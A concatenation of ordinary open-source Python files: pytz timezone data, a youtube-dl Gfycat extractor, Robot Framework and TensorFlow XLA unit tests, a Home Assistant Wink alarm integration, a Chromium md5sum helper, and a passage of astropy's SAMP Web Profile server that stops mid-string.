d(2013,11,3,6,0,0),
d(2014,3,9,7,0,0),
d(2014,11,2,6,0,0),
d(2015,3,8,7,0,0),
d(2015,11,1,6,0,0),
d(2016,3,13,7,0,0),
d(2016,11,6,6,0,0),
d(2017,3,12,7,0,0),
d(2017,11,5,6,0,0),
d(2018,3,11,7,0,0),
d(2018,11,4,6,0,0),
d(2019,3,10,7,0,0),
d(2019,11,3,6,0,0),
d(2020,3,8,7,0,0),
d(2020,11,1,6,0,0),
d(2021,3,14,7,0,0),
d(2021,11,7,6,0,0),
d(2022,3,13,7,0,0),
d(2022,11,6,6,0,0),
d(2023,3,12,7,0,0),
d(2023,11,5,6,0,0),
d(2024,3,10,7,0,0),
d(2024,11,3,6,0,0),
d(2025,3,9,7,0,0),
d(2025,11,2,6,0,0),
d(2026,3,8,7,0,0),
d(2026,11,1,6,0,0),
d(2027,3,14,7,0,0),
d(2027,11,7,6,0,0),
d(2028,3,12,7,0,0),
d(2028,11,5,6,0,0),
d(2029,3,11,7,0,0),
d(2029,11,4,6,0,0),
d(2030,3,10,7,0,0),
d(2030,11,3,6,0,0),
d(2031,3,9,7,0,0),
d(2031,11,2,6,0,0),
d(2032,3,14,7,0,0),
d(2032,11,7,6,0,0),
d(2033,3,13,7,0,0),
d(2033,11,6,6,0,0),
d(2034,3,12,7,0,0),
d(2034,11,5,6,0,0),
d(2035,3,11,7,0,0),
d(2035,11,4,6,0,0),
d(2036,3,9,7,0,0),
d(2036,11,2,6,0,0),
d(2037,3,8,7,0,0),
d(2037,11,1,6,0,0),
]
_transition_info = [
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CWT'),
i(-18000,3600,'CPT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-21600,0,'CST'),
i(-18000,3600,'CDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
i(-14400,3600,'EDT'),
i(-18000,0,'EST'),
]
Monticello = Monticello()
| newvem/pytz | pytz/zoneinfo/America/Kentucky/Monticello.py | Python | mit | 6,463 |
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
float_or_none,
qualities,
)
class GfycatIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?gfycat\.com/(?P<id>[^/?#]+)'
_TEST = {
'url': 'http://gfycat.com/DeadlyDecisiveGermanpinscher',
'info_dict': {
'id': 'DeadlyDecisiveGermanpinscher',
'ext': 'mp4',
'title': 'Ghost in the Shell',
'timestamp': 1410656006,
'upload_date': '20140914',
'uploader': 'anonymous',
'duration': 10.4,
'view_count': int,
'like_count': int,
'dislike_count': int,
'categories': list,
'age_limit': 0,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
gfy = self._download_json(
'http://gfycat.com/cajax/get/%s' % video_id,
video_id, 'Downloading video info')['gfyItem']
title = gfy.get('title') or gfy['gfyName']
description = gfy.get('description')
timestamp = int_or_none(gfy.get('createDate'))
uploader = gfy.get('userName')
view_count = int_or_none(gfy.get('views'))
like_count = int_or_none(gfy.get('likes'))
dislike_count = int_or_none(gfy.get('dislikes'))
age_limit = 18 if gfy.get('nsfw') == '1' else 0
width = int_or_none(gfy.get('width'))
height = int_or_none(gfy.get('height'))
fps = int_or_none(gfy.get('frameRate'))
num_frames = int_or_none(gfy.get('numFrames'))
duration = float_or_none(num_frames, fps) if num_frames and fps else None
categories = gfy.get('tags') or gfy.get('extraLemmas') or []
FORMATS = ('gif', 'webm', 'mp4')
quality = qualities(FORMATS)
formats = []
for format_id in FORMATS:
video_url = gfy.get('%sUrl' % format_id)
if not video_url:
continue
filesize = gfy.get('%sSize' % format_id)
formats.append({
'url': video_url,
'format_id': format_id,
'width': width,
'height': height,
'fps': fps,
'filesize': filesize,
'quality': quality(format_id),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'timestamp': timestamp,
'uploader': uploader,
'duration': duration,
'view_count': view_count,
'like_count': like_count,
'dislike_count': dislike_count,
'categories': categories,
'age_limit': age_limit,
'formats': formats,
}
| apllicationCOM/youtube-dl-api-server | youtube_dl_server/youtube_dl/extractor/gfycat.py | Python | unlicense | 2,868 |
import unittest
import os
from os.path import abspath, join
from robot.running.importer import ImportCache
from robot.errors import FrameworkError
from robot.utils.asserts import assert_equal, assert_true, assert_raises
from robot.utils import normpath
class TestImportCache(unittest.TestCase):
def setUp(self):
self.cache = ImportCache()
self.cache[('lib', ['a1', 'a2'])] = 'Library'
self.cache['res'] = 'Resource'
def test_add_item(self):
assert_equal(self.cache._keys, [('lib', ['a1', 'a2']), 'res'])
assert_equal(self.cache._items, ['Library', 'Resource'])
def test_overwrite_item(self):
self.cache['res'] = 'New Resource'
assert_equal(self.cache['res'], 'New Resource')
assert_equal(self.cache._keys, [('lib', ['a1', 'a2']), 'res'])
assert_equal(self.cache._items, ['Library', 'New Resource'])
def test_get_existing_item(self):
assert_equal(self.cache['res'], 'Resource')
assert_equal(self.cache[('lib', ['a1', 'a2'])], 'Library')
assert_equal(self.cache[('lib', ['a1', 'a2'])], 'Library')
assert_equal(self.cache['res'], 'Resource')
def test_contains_item(self):
assert_true(('lib', ['a1', 'a2']) in self.cache)
assert_true('res' in self.cache)
assert_true(('lib', ['a1', 'a2', 'wrong']) not in self.cache)
assert_true('nonex' not in self.cache)
def test_get_non_existing_item(self):
assert_raises(KeyError, self.cache.__getitem__, 'nonex')
assert_raises(KeyError, self.cache.__getitem__, ('lib1', ['wrong']))
def test_invalid_key(self):
assert_raises(FrameworkError, self.cache.__setitem__, ['inv'], None)
def test_existing_absolute_paths_are_normalized(self):
cache = ImportCache()
path = join(abspath('.'), '.', os.listdir('.')[0])
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], normpath(path, case_normalize=True))
def test_existing_non_absolute_paths_are_not_normalized(self):
cache = ImportCache()
path = os.listdir('.')[0]
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], path)
def test_non_existing_absolute_paths_are_not_normalized(self):
cache = ImportCache()
path = join(abspath('.'), '.', 'NonExisting.file')
value = object()
cache[path] = value
assert_equal(cache[path], value)
assert_equal(cache._keys[0], path)
if __name__ == '__main__':
unittest.main()
| alexandrul-ci/robotframework | utest/running/test_importer.py | Python | apache-2.0 | 2,640 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for XLA op wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.compiler.tf2xla.python import xla
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
class XlaOpsTest(xla_test.XLATestCase, parameterized.TestCase):
def _assertOpOutputMatchesExpected(self, op, args, expected,
equality_fn=None):
with self.test_session() as session:
with self.test_scope():
placeholders = [
array_ops.placeholder(dtypes.as_dtype(arg.dtype), arg.shape)
for arg in args
]
feeds = {placeholders[i]: args[i] for i in range(0, len(args))}
output = op(*placeholders)
result = session.run(output, feeds)
if not equality_fn:
equality_fn = self.assertAllClose
equality_fn(result, expected, rtol=1e-3)
def testAdd(self):
for dtype in self.numeric_types:
self._assertOpOutputMatchesExpected(
xla.add,
args=(np.array([1, 2, 3], dtype=dtype),
np.array([4, 5, 6], dtype=dtype)),
expected=np.array([5, 7, 9], dtype=dtype))
self._assertOpOutputMatchesExpected(
lambda x, y: xla.add(x, y, broadcast_dims=(0,)),
args=(np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([7, 11], dtype=dtype)),
expected=np.array([[8, 9], [14, 15]], dtype=dtype))
self._assertOpOutputMatchesExpected(
lambda x, y: xla.add(x, y, broadcast_dims=(1,)),
args=(np.array([[1, 2], [3, 4]], dtype=dtype),
np.array([7, 11], dtype=dtype)),
expected=np.array([[8, 13], [10, 15]], dtype=dtype))
def testBroadcast(self):
for dtype in self.numeric_types:
v = np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2])
self._assertOpOutputMatchesExpected(
lambda x: xla.broadcast(x, (7, 42)),
args=(v,),
expected=np.tile(v, (7, 42, 1, 1)))
def testShiftRightLogical(self):
self._assertOpOutputMatchesExpected(
xla.shift_right_logical,
args=(np.array([-1, 16], dtype=np.int32), np.int32(4)),
expected=np.array([0x0FFFFFFF, 1], dtype=np.int32))
self._assertOpOutputMatchesExpected(
xla.shift_right_logical,
args=(np.array([0xFFFFFFFF, 16], dtype=np.uint32), np.uint32(4)),
expected=np.array([0x0FFFFFFF, 1], dtype=np.uint32))
def testShiftRightArithmetic(self):
self._assertOpOutputMatchesExpected(
xla.shift_right_arithmetic,
args=(np.array([-1, 16], dtype=np.int32), np.int32(4)),
expected=np.array([-1, 1], dtype=np.int32))
self._assertOpOutputMatchesExpected(
xla.shift_right_arithmetic,
args=(np.array([0xFFFFFFFF, 16], dtype=np.uint32), np.uint32(4)),
expected=np.array([0xFFFFFFFF, 1], dtype=np.uint32))
PRECISION_VALUES = (None, xla_data_pb2.PrecisionConfig.DEFAULT,
xla_data_pb2.PrecisionConfig.HIGH,
xla_data_pb2.PrecisionConfig.HIGHEST)
@parameterized.parameters(*PRECISION_VALUES)
def testConv(self, precision):
for dtype in set(self.float_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
def conv_1d_fn(lhs, rhs):
dnums = xla_data_pb2.ConvolutionDimensionNumbers()
num_spatial_dims = 1
dnums.input_batch_dimension = 0
dnums.input_feature_dimension = 1
dnums.output_batch_dimension = 0
dnums.output_feature_dimension = 1
dnums.kernel_output_feature_dimension = 0
dnums.kernel_input_feature_dimension = 1
dnums.input_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
dnums.kernel_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
dnums.output_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
precision_config = None
if precision:
precision_config = xla_data_pb2.PrecisionConfig()
precision_config.operand_precision.extend([precision, precision])
        return xla.conv(
            lhs,
            rhs,
            window_strides=(1,),
            padding=((2, 1),),
            lhs_dilation=(1,),
            rhs_dilation=(2,),
            dimension_numbers=dnums,
            precision_config=precision_config)
self._assertOpOutputMatchesExpected(
conv_1d_fn,
args=(
np.array([[[3, 4, 5, 6]]], dtype=dtype),
np.array([[[-2, -3]]], dtype=dtype),
),
expected=np.array([[[-9, -12, -21, -26, -10]]], dtype=dtype))
@parameterized.parameters(*PRECISION_VALUES)
def testDotGeneral(self, precision):
for dtype in self.float_types:
def dot_fn(lhs, rhs):
dnums = xla_data_pb2.DotDimensionNumbers()
dnums.lhs_contracting_dimensions.append(2)
dnums.rhs_contracting_dimensions.append(1)
dnums.lhs_batch_dimensions.append(0)
dnums.rhs_batch_dimensions.append(0)
precision_config = None
if precision:
precision_config = xla_data_pb2.PrecisionConfig()
precision_config.operand_precision.extend([precision, precision])
return xla.dot_general(
lhs,
rhs,
dimension_numbers=dnums,
precision_config=precision_config)
lhs = np.array(
[
[[1, 2], [3, 4]],
[[5, 6], [7, 8]],
], dtype=dtype)
rhs = np.array(
[
[[1, 2, 3], [4, 5, 6]],
[[7, 8, 9], [10, 11, 12]],
], dtype=dtype)
self._assertOpOutputMatchesExpected(
dot_fn,
args=(lhs, rhs),
expected=np.array(
[
[[9, 12, 15], [19, 26, 33]],
[[95, 106, 117], [129, 144, 159]],
],
dtype=dtype))
def testNeg(self):
for dtype in self.numeric_types - {np.uint8, np.int8}:
self._assertOpOutputMatchesExpected(
xla.neg,
args=(np.array([1, 2, 3], dtype=dtype),),
expected=np.array([-1, -2, -3], dtype=dtype))
def testPad(self):
for dtype in self.numeric_types:
def pad_fn(x):
return xla.pad(
x,
padding_value=7,
padding_low=[2, 1],
padding_high=[1, 2],
padding_interior=[1, 0])
self._assertOpOutputMatchesExpected(
pad_fn,
args=(np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2]),),
expected=np.array(
[[7, 7, 7, 7, 7], [7, 7, 7, 7, 7], [7, 0, 1, 7, 7],
[7, 7, 7, 7, 7], [7, 2, 3, 7, 7], [7, 7, 7, 7, 7]],
dtype=dtype))
def testReduce(self):
for dtype in set(self.numeric_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
@function.Defun(dtype, dtype)
def sum_reducer(x, y):
return x + y
def sum_reduction(dims):
def fn(x):
return xla.reduce(
x, init_value=0, dimensions_to_reduce=dims, reducer=sum_reducer)
return fn
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[0]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([12, 15, 18, 21], dtype=dtype))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[1]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([6, 22, 38], dtype=dtype))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[0, 1]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=dtype(66))
@function.Defun(dtype, dtype)
def mul_reducer(x, y):
return x * y
def mul_reduction(dims):
def fn(x):
return xla.reduce(
x, init_value=1, dimensions_to_reduce=dims, reducer=mul_reducer)
return fn
self._assertOpOutputMatchesExpected(
mul_reduction(dims=[0]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([0, 45, 120, 231], dtype=dtype))
def testSelectAndScatter(self):
for dtype in set(self.numeric_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
@function.Defun(dtype, dtype)
def add_scatter(x, y):
return x + y
@function.Defun(dtype, dtype)
def ge_select(x, y):
return x >= y
def test_fn(operand, source):
return xla.select_and_scatter(
operand,
window_dimensions=[2, 3, 1, 1],
window_strides=[2, 2, 1, 1],
padding=[[0, 0]] * 4,
source=source,
init_value=0,
select=ge_select,
scatter=add_scatter)
self._assertOpOutputMatchesExpected(
test_fn,
args=(np.array(
[[7, 2, 5, 3, 8], [3, 8, 9, 3, 4], [1, 5, 7, 5, 6],
[0, 6, 2, 10, 2]],
dtype=dtype).reshape((4, 5, 1, 1)),
np.array([[2, 6], [3, 1]], dtype=dtype).reshape((2, 2, 1, 1))),
expected=np.array(
[[0, 0, 0, 0, 0], [0, 0, 8, 0, 0], [0, 0, 3, 0, 0],
[0, 0, 0, 1, 0]],
dtype=dtype).reshape((4, 5, 1, 1)))
def testTranspose(self):
for dtype in self.numeric_types:
v = np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2])
self._assertOpOutputMatchesExpected(
lambda x: xla.transpose(x, [1, 0]), args=(v,), expected=v.T)
def testDynamicSlice(self):
for dtype in self.numeric_types:
self._assertOpOutputMatchesExpected(
xla.dynamic_slice,
args=(np.arange(1000,
dtype=np.int32).astype(dtype).reshape([10, 10, 10]),
np.array([5, 7, 3]), np.array([2, 3, 2])),
expected=np.array(
np.array([[[573, 574], [583, 584], [593, 594]],
[[673, 674], [683, 684], [693, 694]]]),
dtype=dtype))
def testDynamicSliceWithIncorrectStartIndicesShape(self):
with self.test_session() as session:
with self.test_scope():
output = xla.dynamic_slice(
np.arange(1000, dtype=np.int32).reshape([10, 10, 10]),
np.array([5, 7]), np.array([2, 3, 4]))
with self.assertRaises(errors.InvalidArgumentError) as invalid_arg_error:
session.run(output)
self.assertRegexpMatches(
invalid_arg_error.exception.message,
(r'start_indices must be a vector with length equal to input rank, '
r'but input rank is 3 and start_indices has shape \[2\].*'))
def testDynamicSliceWithIncorrectSizeIndicesShape(self):
with self.test_session() as session:
with self.test_scope():
output = xla.dynamic_slice(
np.arange(1000, dtype=np.int32).reshape([10, 10, 10]),
np.array([5, 7, 3]), np.array([2, 3]))
with self.assertRaises(errors.InvalidArgumentError) as invalid_arg_error:
session.run(output)
self.assertRegexpMatches(
invalid_arg_error.exception.message,
(r'size_indices must be a vector with length equal to input rank, '
r'but input rank is 3 and size_indices has shape \[2\].*'))
if __name__ == '__main__':
googletest.main()
| jendap/tensorflow | tensorflow/compiler/tests/xla_ops_test.py | Python | apache-2.0 | 12,658 |
"""Support Wink alarm control panels."""
import pywink
import homeassistant.components.alarm_control_panel as alarm
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
)
from homeassistant.const import (
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_DISARMED,
)
from . import DOMAIN, WinkDevice
STATE_ALARM_PRIVACY = "Private"
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Wink platform."""
for camera in pywink.get_cameras():
# get_cameras returns multiple device types.
# Only add those that aren't sensors.
try:
camera.capability()
except AttributeError:
_id = camera.object_id() + camera.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkCameraDevice(camera, hass)])
class WinkCameraDevice(WinkDevice, alarm.AlarmControlPanelEntity):
"""Representation a Wink camera alarm."""
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[DOMAIN]["entities"]["alarm_control_panel"].append(self)
@property
def state(self):
"""Return the state of the device."""
wink_state = self.wink.state()
if wink_state == "away":
state = STATE_ALARM_ARMED_AWAY
elif wink_state == "home":
state = STATE_ALARM_DISARMED
elif wink_state == "night":
state = STATE_ALARM_ARMED_HOME
else:
state = None
return state
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY
def alarm_disarm(self, code=None):
"""Send disarm command."""
self.wink.set_mode("home")
def alarm_arm_home(self, code=None):
"""Send arm home command."""
self.wink.set_mode("night")
def alarm_arm_away(self, code=None):
"""Send arm away command."""
self.wink.set_mode("away")
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {"private": self.wink.private()}
| sdague/home-assistant | homeassistant/components/wink/alarm_control_panel.py | Python | apache-2.0 | 2,276 |
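The state property above maps pywink camera modes onto Home Assistant alarm states. The stand-alone sketch below restates that mapping with plain strings (the literal values of the STATE_ALARM_* constants) so it runs without Home Assistant installed; it is illustrative, not part of the integration.

# Hypothetical restatement of WinkCameraDevice.state: pywink mode -> HA state.
# The string values mirror STATE_ALARM_ARMED_AWAY / _ARMED_HOME / _DISARMED.
WINK_MODE_TO_ALARM_STATE = {
    "away": "armed_away",
    "home": "disarmed",
    "night": "armed_home",
}

def map_wink_mode(mode):
    # Unknown modes (e.g. a privacy mode) fall through to None, mirroring the
    # else branch of the state property above.
    return WINK_MODE_TO_ALARM_STATE.get(mode)

assert map_wink_mode("night") == "armed_home"
assert map_wink_mode("Private") is None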
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import os
import tempfile
import types
from pylib import cmd_helper
from pylib import constants
from pylib.utils import device_temp_file
HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
MD5SUM_DEVICE_LIB_PATH = '/data/local/tmp/md5sum/'
MD5SUM_DEVICE_BIN_PATH = MD5SUM_DEVICE_LIB_PATH + 'md5sum_bin'
MD5SUM_DEVICE_SCRIPT_FORMAT = (
'test -f {path} -o -d {path} '
'&& LD_LIBRARY_PATH={md5sum_lib} {md5sum_bin} {path}')
def CalculateHostMd5Sums(paths):
"""Calculates the MD5 sum value for all items in |paths|.
Args:
paths: A list of host paths to md5sum.
Returns:
A list of named tuples with 'hash' and 'path' attributes.
"""
if isinstance(paths, basestring):
paths = [paths]
out = cmd_helper.GetCmdOutput(
[os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host')] +
[p for p in paths])
return [HashAndPath(*l.split(None, 1)) for l in out.splitlines()]
def CalculateDeviceMd5Sums(paths, device):
"""Calculates the MD5 sum value for all items in |paths|.
Args:
    paths: A list of device paths to md5sum.
    device: The device (a DeviceUtils-style object) on which to run md5sum.
Returns:
A list of named tuples with 'hash' and 'path' attributes.
"""
if isinstance(paths, basestring):
paths = [paths]
if not device.FileExists(MD5SUM_DEVICE_BIN_PATH):
device.adb.Push(
os.path.join(constants.GetOutDirectory(), 'md5sum_dist'),
MD5SUM_DEVICE_LIB_PATH)
out = []
with tempfile.NamedTemporaryFile() as md5sum_script_file:
with device_temp_file.DeviceTempFile(
device.adb) as md5sum_device_script_file:
md5sum_script = (
MD5SUM_DEVICE_SCRIPT_FORMAT.format(
path=p, md5sum_lib=MD5SUM_DEVICE_LIB_PATH,
md5sum_bin=MD5SUM_DEVICE_BIN_PATH)
for p in paths)
md5sum_script_file.write('; '.join(md5sum_script))
md5sum_script_file.flush()
device.adb.Push(md5sum_script_file.name, md5sum_device_script_file.name)
out = device.RunShellCommand(['sh', md5sum_device_script_file.name])
return [HashAndPath(*l.split(None, 1)) for l in out]
| mxOBS/deb-pkg_trusty_chromium-browser | build/android/pylib/utils/md5sum.py | Python | bsd-3-clause | 2,266 |
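A hedged usage sketch for the helpers above. It assumes a Chromium Android checkout in which md5sum_bin_host and md5sum_dist have already been built, plus a pylib DeviceUtils-style `device` object for the device-side call; the file paths are placeholders.

from pylib.utils import md5sum

# Host-side: hashes are computed by shelling out to md5sum_bin_host in the
# output directory.
for entry in md5sum.CalculateHostMd5Sums(['/tmp/example_file']):
    print(entry.hash, entry.path)

# Device-side: the md5sum_dist bundle is pushed on first use, then a small
# shell script runs the binary over every requested path.
# for entry in md5sum.CalculateDeviceMd5Sums(['/sdcard/example_file'], device):
#     print(entry.hash, entry.path)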
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from urllib.parse import parse_qs
from urllib.request import urlopen
from astropy.utils.data import get_pkg_data_contents
from .standard_profile import (SAMPSimpleXMLRPCRequestHandler,
ThreadingXMLRPCServer)
__all__ = []
CROSS_DOMAIN = get_pkg_data_contents('data/crossdomain.xml')
CLIENT_ACCESS_POLICY = get_pkg_data_contents('data/clientaccesspolicy.xml')
class WebProfileRequestHandler(SAMPSimpleXMLRPCRequestHandler):
"""
Handler of XMLRPC requests performed through the Web Profile.
"""
def _send_CORS_header(self):
if self.headers.get('Origin') is not None:
method = self.headers.get('Access-Control-Request-Method')
if method and self.command == "OPTIONS":
# Preflight method
self.send_header('Content-Length', '0')
self.send_header('Access-Control-Allow-Origin',
self.headers.get('Origin'))
self.send_header('Access-Control-Allow-Methods', method)
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
self.send_header('Access-Control-Allow-Credentials', 'true')
else:
# Simple method
self.send_header('Access-Control-Allow-Origin',
self.headers.get('Origin'))
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
self.send_header('Access-Control-Allow-Credentials', 'true')
def end_headers(self):
self._send_CORS_header()
SAMPSimpleXMLRPCRequestHandler.end_headers(self)
def _serve_cross_domain_xml(self):
cross_domain = False
if self.path == "/crossdomain.xml":
# Adobe standard
response = CROSS_DOMAIN
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/x-cross-domain-policy')
self.send_header("Content-Length", f"{len(response)}")
self.end_headers()
self.wfile.write(response.encode('utf-8'))
self.wfile.flush()
cross_domain = True
elif self.path == "/clientaccesspolicy.xml":
# Microsoft standard
response = CLIENT_ACCESS_POLICY
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/xml')
self.send_header("Content-Length", f"{len(response)}")
self.end_headers()
self.wfile.write(response.encode('utf-8'))
self.wfile.flush()
cross_domain = True
return cross_domain
def do_POST(self):
if self._serve_cross_domain_xml():
return
return SAMPSimpleXMLRPCRequestHandler.do_POST(self)
def do_HEAD(self):
if not self.is_http_path_valid():
self.report_404()
return
if self._serve_cross_domain_xml():
return
def do_OPTIONS(self):
self.send_response(200, 'OK')
self.end_headers()
def do_GET(self):
if not self.is_http_path_valid():
self.report_404()
return
split_path = self.path.split('?')
if split_path[0] in [f'/translator/{clid}' for clid in self.server.clients]:
# Request of a file proxying
urlpath = parse_qs(split_path[1])
try:
proxyfile = urlopen(urlpath["ref"][0])
self.send_response(200, 'OK')
self.end_headers()
self.wfile.write(proxyfile.read())
proxyfile.close()
except OSError:
self.report_404()
return
if self._serve_cross_domain_xml():
return
def is_http_path_valid(self):
valid_paths = (["/clientaccesspolicy.xml", "/crossdomain.xml"] +
[f'/translator/{clid}' for clid in self.server.clients])
return self.path.split('?')[0] in valid_paths
class WebProfileXMLRPCServer(ThreadingXMLRPCServer):
"""
XMLRPC server supporting the SAMP Web Profile.
"""
def __init__(self, addr, log=None, requestHandler=WebProfileRequestHandler,
logRequests=True, allow_none=True, encoding=None):
self.clients = []
ThreadingXMLRPCServer.__init__(self, addr, log, requestHandler,
logRequests, allow_none, encoding)
def add_client(self, client_id):
self.clients.append(client_id)
def remove_client(self, client_id):
try:
self.clients.remove(client_id)
except ValueError:
# No warning here because this method gets called for all clients,
# not just web clients, and we expect it to fail for non-web
# clients.
pass
def web_profile_text_dialog(request, queue):
samp_name = "unknown"
if isinstance(request[0], str):
# To support the old protocol version
samp_name = request[0]
else:
samp_name = request[0]["samp.name"]
text = \
f"""A Web application which declares to be
Name: {samp_name}
Origin: {request[2]}
